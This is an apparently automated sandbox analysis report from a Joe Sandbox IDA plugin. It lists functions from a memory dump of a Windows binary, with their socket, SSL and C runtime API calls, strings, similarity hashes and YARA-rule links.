Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: AddressProc$HandleModule$LibraryLoad_mbspbrk
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 2293913591-3788156360
Opcode ID: 78805f3da44b9d1599e01779b04495847ddc0bdd6b49cabce248c99673dea04a
Instruction ID: 20459d6f9c83551be349a5cc5d6a6dd60ef88acd3939be1277c26c21e77b7af8
Opcode Fuzzy Hash: 78805f3da44b9d1599e01779b04495847ddc0bdd6b49cabce248c99673dea04a
Instruction Fuzzy Hash: 8C01D220E0EB4391FB18BB18A941374E3A1AF15385FC48838D56E422E1EFFCB159C2E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDE6A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

select/poll on SSL socket, errno: %d, xrefs: 00007FF7F1DDE8A2
schannel: timed out sending data (bytes sent: %zd), xrefs: 00007FF7F1DDE8C2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
API String ID: 0-3891197721
Opcode ID: 69532c37bb6105c319ca78b87632617471ba0575841cc5b9c97e0b770e2f2e62
Instruction ID: 0b9bbc6e5774bdc4e113f1b6695e7b693e7b6469b5f97a42840e674290fcfafb
Opcode Fuzzy Hash: 69532c37bb6105c319ca78b87632617471ba0575841cc5b9c97e0b770e2f2e62
Instruction Fuzzy Hash: CF719E72F097028AEB14EB65E4806AC73B5BB487A8F814235DE3D577D4DF78E40993A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDE490 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

SSL/TLS connection timeout, xrefs: 00007FF7F1DDE5EB
select/poll on SSL/TLS socket, errno: %d, xrefs: 00007FF7F1DDE5CF

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
API String ID: 0-3791222319
Opcode ID: 39f216f3763744a07aa75342d715392161864aaf3d59f6ecbabe224144740d57
Instruction ID: 64e434511cb380077bc9c219ab4edfcac4644f6b090af78ba138811830a8922f
Opcode Fuzzy Hash: 39f216f3763744a07aa75342d715392161864aaf3d59f6ecbabe224144740d57
Instruction Fuzzy Hash: C351C622B1964285EB55FB269844279B361FB84BD4FE48634DE2E433D5EFBCE400D790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9F579 Relevance: 5.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1D9EDEC: _time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1D9EE38

Part of subcall function 00007FF7F1D9A9B4: _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA14
Part of subcall function 00007FF7F1D9A9B4: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA72
Part of subcall function 00007FF7F1D9A9B4: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF7F1D9F5B7,?,00000001,?,00000000), ref: 00007FF7F1D9AA8D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F5D8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F5E7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F5F6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,00007FF7F1D9F940), ref: 00007FF7F1D9F604

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_close_time64fflushfputs
String ID:
API String ID: 3931261741-0
Opcode ID: 130d4a768d0c290c2e4020ca026117d3e08ce7ec069cc47156d902afadf02fd4
Instruction ID: d3482254b4097e2b76d2a25bdc3347ba64cb550c190917c07216caca0dc15788
Opcode Fuzzy Hash: 130d4a768d0c290c2e4020ca026117d3e08ce7ec069cc47156d902afadf02fd4
Instruction Fuzzy Hash: 92218122719B9286EB5AEF11E0047B9A7B4FB48B84F854531CE2D4B395EFBCE04583D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9F1CE Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF7F1D9F276
no transfer performed, xrefs: 00007FF7F1D9F1E1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: 0$no transfer performed
API String ID: 0-3908658408
Opcode ID: 8cd2335b6e3f82647d859969877286a3d7b2cdaa466d46e85c2084e360f30dc0
Instruction ID: edbaef1e676baf3a91ab21f990dcb4be2c0f0cf6fcd51c17fcb20605221e9ba4
Opcode Fuzzy Hash: 8cd2335b6e3f82647d859969877286a3d7b2cdaa466d46e85c2084e360f30dc0
Instruction Fuzzy Hash: AD318756A0C54345FB68BA6254903BADBB0AF81B80FC40071DD6DCA6D5DFBCE44683E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB2F1C Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00007FF7F1DB2F3D
getsockopt.WS2_32 ref: 00007FF7F1DB2F60
WSAGetLastError.WS2_32 ref: 00007FF7F1DB2F6A

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLastSleepgetsockopt
String ID:
API String ID: 3033474312-0
Opcode ID: 8b98add12cb3ebfd2e4ce57eefd2cc2bce7051c84efd4f3bf6b85bc5aa5583f4
Instruction ID: dd811fb90dc0c5c7dff45518a6979ab870e8be329c357420b89886b1f7dbd04c
Opcode Fuzzy Hash: 8b98add12cb3ebfd2e4ce57eefd2cc2bce7051c84efd4f3bf6b85bc5aa5583f4
Instruction Fuzzy Hash: 9E01713360864393E754DB16E40427AE3B0AB4D785F648438EA5A47AE8DFBDE4448B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93CD4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1D93D75

Strings

%s%s, xrefs: 00007FF7F1D93D6E

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %s%s
API String ID: 1992661772-3252725368
Opcode ID: 329eb3bc379dc0d14727fea0264f8e85c18507a3dbbaabb6cc615e145aa37896
Instruction ID: 6c8fb710071a35efa13f4cc2539a4bb59b15f9bec7d51d03a7948b4416940d20
Opcode Fuzzy Hash: 329eb3bc379dc0d14727fea0264f8e85c18507a3dbbaabb6cc615e145aa37896
Instruction Fuzzy Hash: AE319E21A1964655FB65AB2AA45027AA7E4BF48B84FC80035DD2E473E4EFBCE54183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB4260 Relevance: 3.1, APIs: 2, Instructions: 87networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF7F1DB4353
ioctlsocket.WS2_32 ref: 00007FF7F1DB4387

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ioctlsocketsocket
String ID:
API String ID: 416004797-0
Opcode ID: a775c54eaf3f6829044519add8cdc98c4e607f709a7dc7f3796e535a40421cd9
Instruction ID: 9aae083e7c25e9e7b6d1b964b8d1d46a54951c27283a0137fa1f0fbf400e9c73
Opcode Fuzzy Hash: a775c54eaf3f6829044519add8cdc98c4e607f709a7dc7f3796e535a40421cd9
Instruction Fuzzy Hash: 48415B32B056859AEB68DF29D4407A8B3B0FB58B58F488135CA6E473C4DF78E494DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC5814 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF7F1DC583A
closesocket.WS2_32 ref: 00007FF7F1DC5849

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: closesocketsocket
String ID:
API String ID: 2760038618-0
Opcode ID: fc11ebed4c9472233ec0ab33e2941643a747099faefea1a2dff5437e727a53a5
Instruction ID: f85cadbc169853efe655ed461c559af2d1c05dda1831b862d84d3bc15fb04979
Opcode Fuzzy Hash: fc11ebed4c9472233ec0ab33e2941643a747099faefea1a2dff5437e727a53a5
Instruction Fuzzy Hash: 32E09235A0560A86FB586BA480545B52330AF11B35F885730C93D063D0CF9CA48ADBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB2738 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF7F1DB2744
WSAGetLastError.WS2_32 ref: 00007FF7F1DB2753

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 9393d307f0e0c0d7e1402c169a6f424d85d55f259f760e78e46b93d9cc82a3fe
Instruction ID: a30d3ed9f7784d6deff590aacfaa6aee10b0e3a93d43683252ba03d3917d4374
Opcode Fuzzy Hash: 9393d307f0e0c0d7e1402c169a6f424d85d55f259f760e78e46b93d9cc82a3fe
Instruction Fuzzy Hash: 75E0DF32B1460683EF2DEB74E46477862B09B44B36F948738D63B891E4EFEC948093D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAA914 Relevance: 1.7, APIs: 1, Instructions: 234networkCOMMON

Download Yara Rule

APIs

WSACreateEvent.WS2_32 ref: 00007FF7F1DAAA20

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CreateEvent
String ID:
API String ID: 2692171526-0
Opcode ID: a1202a4f35f3f3c974eb3240b5606adf9e5f52a8b1520369c6ffe85bf282d75f
Instruction ID: 4ffaaa4e880e4d71ff7b557d17591760f6829716ab59c069293347db9f784165
Opcode Fuzzy Hash: a1202a4f35f3f3c974eb3240b5606adf9e5f52a8b1520369c6ffe85bf282d75f
Instruction Fuzzy Hash: 50B17076609B4682EB18EF15E580169B3F5FB08B80F948A35CB6D07795DF7CE4A1C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DACE64 Relevance: 1.6, APIs: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

WSACloseEvent.WS2_32 ref: 00007FF7F1DACFC8

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CloseEvent
String ID:
API String ID: 2624557715-0
Opcode ID: a5df2b72610b570ce1908f027d5652573bef9cab6cbb67673dfd0f362df5ac8f
Instruction ID: b52b5bac5345511d48672d0a6199f6ff21eba40c5c4e372a068a75a8044ea7ae
Opcode Fuzzy Hash: a5df2b72610b570ce1908f027d5652573bef9cab6cbb67673dfd0f362df5ac8f
Instruction Fuzzy Hash: D241B032A09A8191EB58FF2194406BCA3B4FB84B94F884031DE1E177D6CFBCE552C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBE8A4 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7F1DBE926

Part of subcall function 00007FF7F1DDF964: socket.WS2_32 ref: 00007FF7F1DDF9B7
Part of subcall function 00007FF7F1DDF964: htonl.WS2_32 ref: 00007FF7F1DDF9DE
Part of subcall function 00007FF7F1DDF964: setsockopt.WS2_32 ref: 00007FF7F1DDFA08
Part of subcall function 00007FF7F1DDF964: bind.WS2_32 ref: 00007FF7F1DDFA20
Part of subcall function 00007FF7F1DDF964: getsockname.WS2_32 ref: 00007FF7F1DDFA39
Part of subcall function 00007FF7F1DDF964: listen.WS2_32 ref: 00007FF7F1DDFA57
Part of subcall function 00007FF7F1DDF964: socket.WS2_32 ref: 00007FF7F1DDFA6E
Part of subcall function 00007FF7F1DDF964: connect.WS2_32 ref: 00007FF7F1DDFA8A
Part of subcall function 00007FF7F1DDF964: ioctlsocket.WS2_32 ref: 00007FF7F1DDFAA8
Part of subcall function 00007FF7F1DDF964: accept.WS2_32 ref: 00007FF7F1DDFADB

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: socket$CriticalInitializeSectionacceptbindconnectgetsocknamehtonlioctlsocketlistensetsockopt
String ID:
API String ID: 3227912855-0
Opcode ID: 9875a259e44e698a382a0477886efb4c24fe8866157c85e1b840ee6d89d01730
Instruction ID: 3e1f11ff2564c0be576d0ec1425bad518dd3d14381ed46c264b5dbc15b306d45
Opcode Fuzzy Hash: 9875a259e44e698a382a0477886efb4c24fe8866157c85e1b840ee6d89d01730
Instruction Fuzzy Hash: D221A222A08B4182E724DF1AE404568B3B4FB9CB40F499231DF9D03751EF78F195C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB4190 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FF7F1DB41D8

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 5d1c12ce3e406ddb47fbfb544e9488b7ac7037f43742f4faecb30d92619eb0f2
Instruction ID: 552af0c62cc428de32a3f7d37ef7aebac41070e3592cc65041d9fa8eff62ae95
Opcode Fuzzy Hash: 5d1c12ce3e406ddb47fbfb544e9488b7ac7037f43742f4faecb30d92619eb0f2
Instruction Fuzzy Hash: 10219261B096C151FF59EB5A90443B9A6B0EF64F84F4C8135CA2E0B7C5DFBCE48593A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA0BC8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FF7F1DA0760,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00007FF7F1DA0C05

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: fgets
String ID:
API String ID: 3135385589-0
Opcode ID: ac3c78e7f8116b5db82dbeb73fa94708eaada963b6dec0bdd3113bf56410781b
Instruction ID: 7816f7c4beb1fb7fb415b89fb727881f036786e32cd98e48aa2561d3fa495a90
Opcode Fuzzy Hash: ac3c78e7f8116b5db82dbeb73fa94708eaada963b6dec0bdd3113bf56410781b
Instruction Fuzzy Hash: F6119122A0C78246FB24E714D4513E993A0EF597E4F844230D9BD437CADFADE5858761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA3938 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

_open.API-MS-WIN-CRT-STDIO-L1-1-0(00007FF7F1D92184), ref: 00007FF7F1DA395A

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _open
String ID:
API String ID: 4183159743-0
Opcode ID: 8b3b092e98626b40b13565fe8faab6bf7b26d7162c65fde3ab2d11e9048430ea
Instruction ID: cde17b075e0ad114c1a7a1ebf4398b10e9e1c184c1ba978bde087f20b791f991
Opcode Fuzzy Hash: 8b3b092e98626b40b13565fe8faab6bf7b26d7162c65fde3ab2d11e9048430ea
Instruction Fuzzy Hash: 9FD05E32B10721C2E708AF1AC441418BA70FBE5F41BD14474C65C03724CF78D5A5CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9A5FA Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1D9A3F0: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1D9A455
Part of subcall function 00007FF7F1D9A3F0: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1D9A475
Part of subcall function 00007FF7F1D9A3F0: WSACleanup.WS2_32 ref: 00007FF7F1D9A48E
Part of subcall function 00007FF7F1D9A3F0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A49E
Part of subcall function 00007FF7F1D9A3F0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A4B7
Part of subcall function 00007FF7F1D9A3F0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A4D0
Part of subcall function 00007FF7F1D9A3F0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A4DE
Part of subcall function 00007FF7F1D9A3F0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9A503

fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9A608

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$FreeLibraryfclose$Cleanupfflush
String ID:
API String ID: 926655102-0
Opcode ID: 118942a41a588764a62101d4cdb4da7eec38e2eb7b33ac475087595b4e9a6439
Instruction ID: dfcd10daa26c58d844a82095cd1b99705e77652c351a411a71ea1abb97693bdf
Opcode Fuzzy Hash: 118942a41a588764a62101d4cdb4da7eec38e2eb7b33ac475087595b4e9a6439
Instruction Fuzzy Hash: 37D05E3BB04B4096DB64AB25E00559C6360F78C780F990572DE7D8334ADE79C841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93510 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetConsoleMode.KERNELBASE ref: 00007FF7F1D9352D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 92635901b1ea465b8fe46a3e3dd3025ac8b39161e71a82ed16274b68352894fe
Instruction ID: 6aeee1ad4e5a1a31b1b870f7863a81c9c65435444e82f8c3cb0defe032bfebbb
Opcode Fuzzy Hash: 92635901b1ea465b8fe46a3e3dd3025ac8b39161e71a82ed16274b68352894fe
Instruction Fuzzy Hash: 5CD0C920E1E55397FB4DBB7AAC91071A3706F48306FD55430C92E822A0DFACE4618BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDF2C0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

